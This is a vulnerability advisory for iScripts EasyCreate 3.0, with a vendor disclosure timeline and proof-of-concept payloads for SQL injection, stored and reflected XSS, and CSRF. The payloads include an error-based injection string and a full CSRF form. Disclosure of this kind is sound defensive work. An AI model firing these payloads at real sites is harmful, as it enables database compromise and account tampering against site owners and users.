143 lines
No EOL
4.5 KiB
Text
143 lines
No EOL
4.5 KiB
Text
iScripts EasyCreate 3.0 Multiple Vulnerabilities
|
|
|
|
|
|
[Vendor Product Description]
|
|
|
|
- iScripts EasyCreate is a private label online website builder. This software allows you to start an
|
|
online business by offering website building services to your customers. Equipped with drag and drop
|
|
design functionality, crisp templates and social sharing capabilities, this online website builder
|
|
software will allow you to provide the best website building features to your users.
|
|
|
|
|
|
- Site: http://www.iscripts.com
|
|
|
|
|
|
[Advisory Timeline]
|
|
|
|
[17.11.2015] First contact to vendor.
|
|
[08.12.2015] Follow up with vendor. No response received.
|
|
[08.12.2015] Ticket Created using online portal (id #010248399110346).
|
|
[08.12.2015] Ticket closed by vendor without requesting vulnerability details.
|
|
[28.12.2015] Vendor responds asking more details.
|
|
[29.12.2015] Sent details to the vendor.
|
|
[05.01.2016] Follow up with vendor. No response received.
|
|
[14.01.2016] Follow up with vendor. No response received.
|
|
[28.01.2016] Public Security advisory released.
|
|
|
|
|
|
[Bug Summary]
|
|
|
|
- SQL Injection
|
|
|
|
- Cross Site Scripting (Stored)
|
|
|
|
- Cross Site Scripting (Reflected)
|
|
|
|
- Cross Site Request Forgery
|
|
|
|
|
|
[Impact]
|
|
|
|
- High
|
|
|
|
|
|
[Affected Version]
|
|
|
|
- EasyCreate 3.0
|
|
|
|
|
|
[Advisory]
|
|
|
|
- ZSL-2016-5298
|
|
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5298.php
|
|
|
|
|
|
[Bug Description and Proof of Concept]
|
|
|
|
1. Cross-Site Request Forgery (CSRF) - The application allows users to perform certain actions via HTTP requests
|
|
without performing any validity checks to verify the requests. This can be exploited to perform certain actions
|
|
with administrative privileges if a logged-in user visits a malicious web site
|
|
https://en.wikipedia.org/wiki/Cross-site_request_forgery
|
|
|
|
2. Cross Site Scripting (XSS) - Multiple cross-site scripting vulnerabilities were also discovered. The issue is
|
|
triggered when input passed via multiple parameters is not properly sanitized before being returned to the user.
|
|
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
|
|
https://en.wikipedia.org/wiki/Cross-site_scripting
|
|
|
|
3. SQL Injection - iScripts EasyCreate suffers from a SQL Injection vulnerability. Input passed via a GET
|
|
parameter is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited
|
|
to manipulate SQL queries by injecting arbitrary SQL code.
|
|
https://en.wikipedia.org/wiki/SQL_injection
|
|
|
|
|
|
|
|
[Proof-of-Concept]
|
|
|
|
1. SQL Injection
|
|
|
|
Parameter:
|
|
siteid (GET)
|
|
|
|
Payload:
|
|
action=editsite&siteid=6 AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(3405=3405,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
2. Multiple Stored Cross Site Scripting
|
|
|
|
Parameter:
|
|
siteName (POST)
|
|
|
|
Payload:
|
|
Content-Disposition: form-data; name="siteName"
|
|
|
|
<script>alert(1)</script>
|
|
|
|
Parameter:
|
|
selectedimage (POST)
|
|
|
|
Payload:
|
|
selectedimage=<script>alert(1)</script>
|
|
|
|
Parameter:
|
|
filename (POST)
|
|
|
|
Payload:
|
|
filename=<script>alert(1)</script>
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
3. Multiple Reflected Cross Site Scripting
|
|
|
|
Parameter
|
|
catid (GET)
|
|
|
|
Parameters
|
|
selectedimage, description, keywords, robotans, refreshans, authorans, copyrightans, revisitans, cmbSearchType (POST)
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
4. Multiple Cross Site Request Forgery (CSRF)
|
|
|
|
Sample Payload for editing profile:
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://localhost/easycreate/demo/editprofile.php?act=post" method="POST">
|
|
<input type="hidden" name="vuser_login" value="user" />
|
|
<input type="hidden" name="vuser_name" value="Demo User" />
|
|
<input type="hidden" name="vuser_lastname" value="PWNED" />
|
|
<input type="hidden" name="vuser_email" value="demo@demo.com" />
|
|
<input type="hidden" name="vuser_address1" value="a" />
|
|
<input type="hidden" name="vcity" value="" />
|
|
<input type="hidden" name="vstate" value="" />
|
|
<input type="hidden" name="vcountry" value="United States" />
|
|
<input type="hidden" name="vzip" value="" />
|
|
<input type="hidden" name="vuser_phone" value="" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
All flaws described here were discovered and researched by:
|
|
|
|
Bikramaditya Guha aka "PhoenixX" |